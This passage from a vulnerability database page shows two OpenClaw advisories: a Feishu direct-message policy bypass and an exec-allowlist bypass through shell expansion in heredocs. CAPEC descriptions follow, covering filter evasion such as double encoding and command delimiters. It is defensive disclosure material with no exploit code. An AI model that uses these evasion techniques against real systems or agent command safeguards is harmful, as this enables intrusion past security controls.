  ]
}

GHSA-HF7P-489H-XHJ4

Vulnerability from github – Published: 2026-05-11 18:31 – Updated: 2026-05-11 18:31
VLAI
Details

OpenClaw before 2026.4.20 contains a message classification vulnerability in Feishu card-action callbacks that misclassifies direct messages as group conversations. Attackers can bypass dmPolicy enforcement by triggering card-action flows in direct message conversations that should have been blocked by restrictive policies.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-44993"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-11T18:16:39Z",
    "severity": "LOW"
  },
  "details": "OpenClaw before 2026.4.20 contains a message classification vulnerability in Feishu card-action callbacks that misclassifies direct messages as group conversations. Attackers can bypass dmPolicy enforcement by triggering card-action flows in direct message conversations that should have been blocked by restrictive policies.",
  "id": "GHSA-hf7p-489h-xhj4",
  "modified": "2026-05-11T18:31:46Z",
  "published": "2026-05-11T18:31:46Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-72q8-jcmc-97wx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44993"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/90979d7c3ef7ec30b9f8aa6963a5e38d2f17d166"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-direct-message-misclassification-in-feishu-card-actions"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

GHSA-HH6M-M25H-86WQ

Vulnerability from github – Published: 2026-05-06 21:31 – Updated: 2026-05-06 21:31
VLAI
Details

OpenClaw before 2026.4.22 contains an exec allowlist analysis vulnerability allowing shell expansion hiding in unquoted heredoc bodies. Attackers can bypass allowlist validation by embedding shell expansion tokens in heredoc bodies to execute unapproved commands at runtime.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2026-44115"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-184"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2026-05-06T20:16:35Z",
    "severity": "HIGH"
  },
  "details": "OpenClaw before 2026.4.22 contains an exec allowlist analysis vulnerability allowing shell expansion hiding in unquoted heredoc bodies. Attackers can bypass allowlist validation by embedding shell expansion tokens in heredoc bodies to execute unapproved commands at runtime.",
  "id": "GHSA-hh6m-m25h-86wq",
  "modified": "2026-05-06T21:31:42Z",
  "published": "2026-05-06T21:31:42Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-x3h8-jrgh-p8jx"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44115"
    },
    {
      "type": "WEB",
      "url": "https://github.com/openclaw/openclaw/commit/b2e8b7d4bb2f22eaa16f5c4b07547774e90b65a5"
    },
    {
      "type": "WEB",
      "url": "https://www.vulncheck.com/advisories/openclaw-shell-expansion-bypass-in-unquoted-heredocs-via-exec-allowlist"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
      "type": "CVSS_V4"
    }
  ]
}

Mitigation
Implementation

Strategy: Input Validation

Do not rely exclusively on detecting disallowed inputs. There are too many variants to encode a character, especially when different environments are used, so there is a high likelihood of missing some variants. Only use detection of disallowed inputs as a mechanism for detecting suspicious activity. Ensure that you are using other protection mechanisms that only identify "good" input - such as lists of allowed inputs - and ensure that you are properly encoding your outputs.

CAPEC-120: Double Encoding

The adversary utilizes a repeating of the encoding process for a set of characters (that is, character encoding a character encoding of a character) to obfuscate the payload of a particular request. This may allow the adversary to bypass filters that attempt to detect illegal characters or strings, such as those that might be used in traversal or injection attacks. Filters may be able to catch illegal encoded strings, but may not catch doubly encoded strings. For example, a dot (.), often used in path traversal attacks and therefore often blocked by filters, could be URL encoded as %2E. However, many filters recognize this encoding and would still block the request. In a double encoding, the % in the above URL encoding would be encoded again as %25, resulting in %252E which some filters might not catch, but which could still be interpreted as a dot (.) by interpreters on the target.

CAPEC-15: Command Delimiters

An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.

CAPEC-182: Flash Injection

An attacker tricks a victim to execute malicious flash content that executes commands or makes flash calls specified by the attacker. One example of this attack is cross-site flashing, an attacker controlled parameter to a reference call loads from content specified by the attacker.

CAPEC-3: Using Leading 'Ghost' Character Sequences to Bypass Input Filters

Some APIs will strip certain leading characters from a string of parameters. An adversary can intentionally introduce leading "ghost" characters (extra characters that don't affect the validity of the request at the API layer) that enable the input to pass the filters and therefore process the adversary's input. This occurs when the targeted API will accept input data in several syntactic forms and interpret it in the equivalent semantic way, while the filter does not take into account the full spectrum of the syntactic forms acceptable to the targeted API.

CAPEC-43: Exploiting Multiple Input Interpretation Layers

An attacker supplies the target software with input data that contains sequences of special characters designed to bypass input validation logic. This exploit relies on the target making multiples passes over the input data and processing a "layer" of special characters with each pass. In this manner, the attacker can disguise input that would otherwise be rejected as invalid by concealing it with layers of special/escape characters that are stripped off by subsequent processing steps. The goal is to first discover cases where the input validation layer executes before one or more parsing layers. That is, user input may go through the following logic in an application: <parser1> --> <input validator> --> <parser2>. In such cases, the attacker will need to provide input that will pass through the input validator, but after passing through parser2, will be converted into something that the input validator was supposed to stop.

CAPEC-6: Argument Injection

An attacker changes the behavior or state of a targeted application through injecting data or command syntax through the targets use of non-validated and non-filtered arguments of exposed services or methods.

CAPEC-71: Using Unicode Encoding to Bypass Validation Logic

An attacker may provide a Unicode string to a system component that is not Unicode aware and use that to circumvent the filter or cause the classifying mechanism to fail to properly understanding the request. That may allow the attacker to slip malicious data past the content filter and/or possibly cause the application to route the request incorrectly.

CAPEC-73: User-Controlled Filename

An attack of this type involves an adversary inserting malicious characters (such as a XSS redirection) into a filename, directly or indirectly that is then used by the target software to generate HTML text or other potentially executable content. Many websites rely on user-generated content and dynamically build resources like files, filenames, and URL links directly from user supplied data. In this attack pattern, the attacker uploads code that can execute in the client browser and/or redirect the client browser to a site that the attacker owns. All XSS attack payload variants can be used to pass and exploit these vulnerabilities.

CAPEC-85: AJAX Footprinting

This attack utilizes the frequent client-server roundtrips in Ajax conversation to scan a system. While Ajax does not open up new vulnerabilities per se, it does optimize them from an attacker point of view. A common first step for an attacker is to footprint the target environment to understand what attacks will work. Since footprinting relies on enumeration, the conversational pattern of rapid, multiple requests and responses that are typical in Ajax applications enable an attacker to look for many vulnerabilities, well-known ports, network locations and so on. The knowledge gained through Ajax fingerprinting can be used to support other attacks, such as XSS.